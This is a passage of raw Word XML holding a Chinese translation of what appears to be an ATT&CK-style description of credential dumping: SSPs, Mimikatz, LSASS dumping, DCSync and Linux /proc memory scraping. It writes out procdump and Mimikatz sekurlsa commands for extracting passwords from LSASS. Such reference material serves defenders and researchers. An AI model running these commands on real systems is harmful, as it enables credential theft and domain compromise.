          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统用户可以</w:t>
      </w:r>
      <w:r>
        <w:t>收集</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9863E6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全支持提供程序接口（</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSPI</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多个安全支持提供程序（</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的通用接口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>SP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态链接库，它</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>应用提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个或多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D6F47" w14:textId="1156E6EE" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSP</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于访问</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2F93F" w14:textId="0C285EDE" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>AV</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：交互式登录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、批量</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录和服务登录通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包完成。</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wdigest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：摘要认证</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计用于超文本传输协议（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）和简单</w:t>
      </w:r>
      <w:r>
        <w:t>认证安全层</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SASL</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）交换。</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：在</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows 2000</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及更高版本中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>彼此</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>身份</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证的</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首选。</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CredSSP</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：为远程桌面服务提供</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSO</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和网络级别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。以下工具可用于枚举</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C80A282" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId128" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Windows Credential Editor</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DE706AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="002D5E77" w:rsidRDefault="00CC5590" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidR="000F2665" w:rsidRPr="002D5E77">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Mimikatz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72F8168D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与内存技术一样，</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSASS</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程内存也可以从目标主机转储并在本地系统上进行分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32861B28" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，在目标主机上使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>procdump</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC91CA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>procdump -ma lsass.exe lsass_dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C01DE6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在本地，可以运行</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r w:rsidRPr="005140AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBEF8F4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>sekurlsa::Minidump lsassdump.dmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F617E0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>sekurlsa::logonPasswords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2DE1FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00B331A9">
        <w:t>DCSync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4366E5" w14:textId="484DA790" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出</w:t>
      </w:r>
      <w:r>
        <w:t>技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一种变体，可用于从域控制器获取敏感信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不是执行可识别的恶意代码，而是通过滥用域控制器的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>PI</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模拟来自远程域控制器的复制过程。域控制器上</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Administrators</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Domain Admins</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enterprise Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>任何成员</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或计算机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r>
        <w:t>目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提取密码数据，其中可能包括潜在有用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KRBTGT</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>的当前和历史哈希</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，这些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哈希</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>又可以用于创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00146707">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidRPr="00146707">
          <w:rPr>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>票据传递</w:t>
        </w:r>
        <w:r w:rsidRPr="00146707">
          <w:t>攻击</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00146707">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”会</w:t>
      </w:r>
      <w:r w:rsidRPr="00146707">
        <w:t>用到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00146707">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“黄</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>金票据</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号操纵</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提到的账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lsadump</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块中已包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Lsadump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NetSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它通过旧版复制协议执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCF640A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00B331A9">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283DAF6C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00B331A9">
        <w:t>Proc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617F8944" w14:textId="1BCD5EB3" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proc</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统包含正在运行操作系统状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大量信息。以</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行的进程可以使用此功能来抓取其他正在运行程序的实时内存。如果这些程序中的任何一个以明文形式存储密码或在内存中存储密码哈希，则这些值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:t>会被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集</w:t>
      </w:r>
      <w:r>
        <w:t>使用或用于暴力破解攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此功能已在</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MimiPenguin</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MimiPenguin</w:t>
      </w:r>
      <w:r w:rsidRPr="00690536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是受</w:t>
      </w:r>
